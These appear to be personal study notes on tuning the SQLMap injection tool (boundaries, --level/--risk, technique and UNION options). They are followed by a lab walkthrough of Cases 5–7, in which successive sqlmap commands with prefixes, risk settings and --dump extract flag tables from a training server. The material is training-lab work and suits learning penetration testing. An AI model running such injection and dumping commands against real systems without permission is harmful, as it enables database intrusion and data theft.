# Basic Tuning - Every payload sent to the target consists of: - vector (e.g., `UNION ALL SELECT 1,2,VERSION()`): central part of the payload, carrying the useful SQL code to be executed at the target. - boundaries (e.g. `'<vector>-- -`): prefix and suffix formations, used for proper injection of the vector into the vulnerable SQL statemen - There is a requirement for special prefix and suffix values in rare cases, not covered by the regular SQLMap run - The `--prefix` and `--suffix` flags can be used as follows - This will result in an enclosure of all vector values between the static prefix `%'))` and the suffix `-- -` ```bash sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -" ``` - By default, SQLMap combines a predefined set of most common boundaries (i.e., prefix/suffix pairs), along with the vectors having a high chance of success in case of a vulnerable target - The option `--level` (`1-5`, default `1`) extends both vectors and boundaries being used, based on their expectancy of success (i.e., the lower the expectancy, the higher the level) - The option `--risk` (`1-3`, default `1`) extends the used vector set based on their risk of causing problems at the target side (i.e., risk of database entry loss or denial-of-service) # Advanced Tuning - Status codes - The option `--code` could be used to fixate the detection of `TRUE` responses to a specific HTTP code (e.g. `--code=200`) - Titles - The switch `--titles` could be used to instruct the detection mechanism to base the comparison based on the content of the HTML tag `<title>` - Strings -  The option `--string` could be used to fixate the detection based only on the appearance of that single value (e.g. `--string=success`) - Test-only -  The `--text-only` switch, which removes all the HTML tags, and bases the comparison only on the textual (i.e., visible) content - Technique selection -  If we want to skip the time-based blind and stacking SQLi payloads and only test for the boolean-based blind, error-based, and UNION-query payloads, we can specify these techniques with `--technique=BEU` - UNION tuning -  If we can manually find the exact number of columns of the vulnerable SQL query, we can provide this number to SQLMap with the option `--union-cols` (e.g. `--union-cols=17`) - In case that the default "dummy" filling values used by SQLMap -`NULL` and random integer- are not compatible with values from results of the vulnerable SQL query, we can specify an alternative value instead (e.g. `--union-char='a'`) - In case there is a requirement to use an appendix at the end of a `UNION` query in the form of the `FROM <table>` (e.g., in case of Oracle), we can set it with the option `--union-from` (e.g. `--union-from=users`) # Exercise ## Case 5 - Detect and exploit (OR) SQLi vulnerability in GET parameter id ```bash sqlmap -u "http://94.237.56.99:54442/case5.php" --data='id=1' --method GET --batch --dump ``` ![[images/Pasted image 20251208194152.png]] - Second attempt with prefix ```bash sqlmap -u "http://94.237.56.99:54442/case5.php" --data='id=1' --method GET --batch --dump --prefix="')" ``` ![[images/Pasted image 20251208194335.png]] - Third attempt with higher level/risk values - Failure; honestly too many tests ```bash sqlmap -u "http://94.237.56.99:54442/case5.php" --data='id=1' --method GET --batch --dump --prefix="')" --risk=3 --level=3 ``` - Fourth attempt with hints ```bash sqlmap -u "http://94.237.56.99:54442/case5.php" --data='id=1' --prefix=")" -T flag5 --no-cast ``` ![[images/Pasted image 20251208195013.png]] - Fifth attempt > scuccess - Boolean-based blind injection ```bash sqlmap -u 'http://94.237.56.99:54442/case5.php?id=*' --level 5 --risk 3 -T flag5 --batch --dump ``` ![[images/Pasted image 20251208195614.png]] ## Case 6 - Detect and exploit SQLi vulnerability in GET parameter col having non-standard boundaries ```bash sqlmap -u 'http://94.237.56.99:54442/case6.php' --data="col=id*" --level 5 --prefix=")" --batch --dump ``` ![[images/Pasted image 20251208200622.png]] - Second attempt ```bash sqlmap -u 'http://94.237.56.99:54442/case6.php?col=*' --level 5 --prefix=")" --batch --dump ``` ![[images/Pasted image 20251208200933.png]] - Third attempt using hint ```bash sqlmap -u 'http://94.237.56.99:54442/case6.php?col=id' --prefix='`)' --batch -T flag6 --dump ``` ![[images/Pasted image 20251208200909.png]] ## Case 7 - Detect and exploit SQLi vulnerability in GET parameter id by usage of UNION query-based technique ```bash sqlmap -u 'http://94.237.56.99:54442/case7.php?id=*' --batch -T flag7 --dump --technique=U ``` ![[images/Pasted image 20251208201208.png]] - Second attempt > increase risk/level ```bash sqlmap -u 'http://94.237.56.99:54442/case7.php?id=*' --batch -T flag7 --dump --technique=U --level=3 --risk=3 ``` ![[images/Pasted image 20251208201323.png]] - Third attempt > use hint - Getting closer ![[images/Pasted image 20251208201542.png]] - Fourth attempt > increase risk value ```bash sqlmap -u 'http://94.237.56.99:54442/case7.php?id=*' --batch --dump --union-cols=5 --no-cast --risk=3 ``` ![[images/Pasted image 20251208201641.png]]